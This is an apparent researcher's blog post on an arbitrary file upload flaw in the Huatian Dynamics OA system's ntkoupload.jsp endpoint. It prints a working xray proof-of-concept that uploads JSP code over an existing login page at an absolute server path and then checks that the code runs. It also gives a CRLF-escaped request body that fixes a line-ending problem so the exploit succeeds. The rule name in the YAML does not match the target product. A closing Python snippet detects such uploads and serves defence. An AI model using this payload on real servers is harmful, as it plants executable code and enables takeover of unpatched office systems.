Huatian Dynamics Collaborative Office System (华天动力协同办公系统) ntkoupload arbitrary file upload vulnerability
My first version of the POC looked like this, but I found that xray has a problem:
name: poc-yaml-ruijie-eg-cli-rce
manual: true
transport: http
set:
  r1: randomInt(8000, 10000)
  r2: randomInt(8000, 10000)
rules:
  r0:
    request:
      cache: true
      method: POST
      path: /OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzRSYXfFlXqk6btQm
        Accept-Encoding: gzip
      body: |
        ------WebKitFormBoundaryzRSYXfFlXqk6btQm
        Content-Disposition: form-data; name="EDITFILE"; filename="xxx.txt"
        Content-Type: image/png

        <%out.print("111");%>
        ------WebKitFormBoundaryzRSYXfFlXqk6btQm
        Content-Disposition: form-data; name="newFileName"

        D:/htoa/Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp
        ------WebKitFormBoundaryzRSYXfFlXqk6btQm--
    expression: response.status == 200
  r1:
    request:
      cache: true
      method: GET
      path: /OAapp/htpages/app/module/login/normalLoginPageForOther.jsp
      headers:
        Content-Type: application/x-www-form-urlencoded
    expression: response.status == 200 && response.body.bcontains(bytes("111"))
expression: r0() && r1()
detail:
  author: whale3070
  links:
    - https:
This vulnerability requires Windows line endings (CRLF) in the request body.
So why are the headers sent with \r\n while the POST data ends up with \n?
This can be considered a defect in xray.
I used Windows line endings in the POC, but when I sent the request with xray on Kali, they were forcibly converted to Linux line endings.
"------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"EDITFILE\"; filename=\"xxx.txt\"\r\nContent-Type: image/png\r\n\r\n<%out.print(\"tested1\");%>\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm\r\nContent-Disposition: form-data; name=\"newFileName\"\r\n\r\nD:/htoa/Tomcat/webapps/OAapp/htpages/app/module/login/normalLoginPageForOther.jsp\r\n------WebKitFormBoundaryzRSYXfFlXqk6btQm--"
In the end, rewriting the body as this quoted string with explicit \r\n escapes solved it.
It sounds simple, but the troubleshooting took me half a day to a full day.
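As an added defender-side example (not code from the post or from xray), the following Python parses a multipart request to the ntkoupload.jsp endpoint described above and flags a newFileName value that names a server-side script or escapes the upload directory; it accepts both CRLF and bare-LF part delimiters, because, as the post shows, tooling in the path may rewrite line endings. The endpoint path and the EDITFILE/newFileName field names come from the post; the sample bodies, the extension policy and the function names are constructed assumptions.

```python
import re

# Endpoint and form field names are from the post; everything else is constructed.
UPLOAD_PATH = "/OAapp/htpages/app/module/trace/component/fileEdit/ntkoupload.jsp"
BOUNDARY = "----WebKitFormBoundaryzRSYXfFlXqk6btQm"
SCRIPT_EXT = (".jsp", ".jspx", ".jspf")  # assumed policy: never writable via upload


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Return {field: (filename or None, content)}; accepts CRLF or bare-LF line
    endings, since a CRLF-only parser would miss the LF-normalised variant."""
    delim = b"--" + boundary.encode()
    fields = {}
    for part in body.split(delim)[1:]:
        if part.startswith(b"--"):  # closing delimiter
            break
        part = part.lstrip(b"\r\n")
        sep = re.search(rb"\r?\n\r?\n", part)  # blank line ends the part headers
        if not sep:
            continue
        headers, content = part[:sep.start()], part[sep.end():]
        # drop the one line break that belongs to the following delimiter
        content = re.sub(rb"\r?\n\Z", b"", content, count=1)
        name = re.search(rb'[; ]name="([^"]*)"', headers)
        fname = re.search(rb'filename="([^"]*)"', headers)
        if name:
            fields[name.group(1).decode()] = (fname and fname.group(1).decode(), content)
    return fields


def is_suspicious_upload(path: str, body: bytes, boundary: str) -> tuple:
    """Flag an ntkoupload.jsp request whose newFileName names a script or escapes
    the intended directory. Returns (suspicious, reason)."""
    if path != UPLOAD_PATH:
        return False, "not the upload endpoint"
    raw = parse_multipart(body, boundary).get("newFileName", (None, b""))[1]
    norm = raw.decode(errors="replace").strip().replace("\\", "/").lower()
    if norm.endswith(SCRIPT_EXT):
        return True, "newFileName names a server-side script: " + norm
    if re.match(r"([a-z]:)?/", norm) or "/../" in "/%s/" % norm:
        return True, "newFileName is an absolute or traversing path: " + norm
    return False, "ok"


def sample_body(new_file_name: str, eol: bytes) -> bytes:
    """Constructed request body with the post's field names and harmless file content."""
    d = b"--" + BOUNDARY.encode()
    return eol.join([d, b'Content-Disposition: form-data; name="EDITFILE"; filename="xxx.txt"',
                     b"Content-Type: image/png", b"", b"constructed sample file content",
                     d, b'Content-Disposition: form-data; name="newFileName"', b"",
                     new_file_name.encode(), d + b"--", b""])
```

A WAF or reverse-proxy rule built on this logic should be applied to the decoded body before any line-ending normalisation, so that both the CRLF and the LF form of the request are caught.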